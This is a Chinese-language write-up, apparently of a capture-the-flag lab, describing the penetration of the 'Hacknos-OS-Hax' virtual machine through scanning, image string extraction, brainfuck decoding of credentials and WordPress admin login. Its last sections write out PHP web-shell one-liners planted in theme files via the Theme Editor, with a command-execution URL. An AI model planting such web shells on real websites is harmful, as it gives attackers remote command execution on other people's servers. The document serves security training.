Bootstrap

Hacknos-OS-Hax打靶渗透【附POC】

1. 信息收集:

  1. 主机扫描:
nmap -sn 192.168.7.0/24|grep -B 2 '08:00:27:7B:60:D8'

  1. 端口扫描22.80······

  1. 目录扫描,

  1. 操作系统等敏感信息

2. 漏洞扫描:

2.1. 进入主页面,常规点击页面功能点,无可利用点;

2.2. 尝试拼接目录扫描结果常规可利用的路径,虽然存在/wordpress页面,但是未渲染;

尝试利用唯一的搜索框,查看是否有可利用的功能点

发现IP地址转换为了localhost域名,但是域名无法正常解析利用

尝试将ip与对应的域名加入至本地hosts文件

还是无法正常渲染

尝试利用burp修改【response header】、【response body】;

同理 修改response body

打开浏览器代理,使得流量通过burp,尝试连接,页面已被渲染

2.3. 拼接目录扫描的/wordpress/wp-login.php

进入登录页面,尝试爆破,无果;

2.4. 拼接目录扫描的/img

发现存在一个flaghost.png,将其下载

利用kali的strings命令与exiftool工具查询flaghost.png中的关键字-》发现存在passw@45字符串-》尝试使用web:passw@45进行登录-》无果

strings flaghost.png | less
apt-get install exiftool
exiftool flaghost.png

2.5. 尝试拼接/passw@45

发现存在两个txt文件,查看发flag2.txt文件-》进入flag2.txt文件,发现存在加密信息

使用以下站点或者其他【brainfuck】解密网站、软件进行解密-》得到账号密码web:Hacker@4514到wordpress后台登录-》成功登录

https://www.dcode.fr/brainfuck-language
http://www.hiencode.com/brain.html

2.6. 进入后台后查看当前用户为超级管理员

通过写主题拿Webshell,点击Appearance-->Theme Editor-->header.php写入一句话木马-》保存通过首页进行访问

<?php system($_REQUEST['kucei']);?>  //写入木马
http://192.168.7.79/wordpress/?kucei=whoami   //木马利用姿势

2.7. 写入一句话木马,尝试蚁剑连接

eval($_POST['kucei']);
phpinfo();

http://ip/wordpress/wp-content/themes/twentynineteen/404.php

;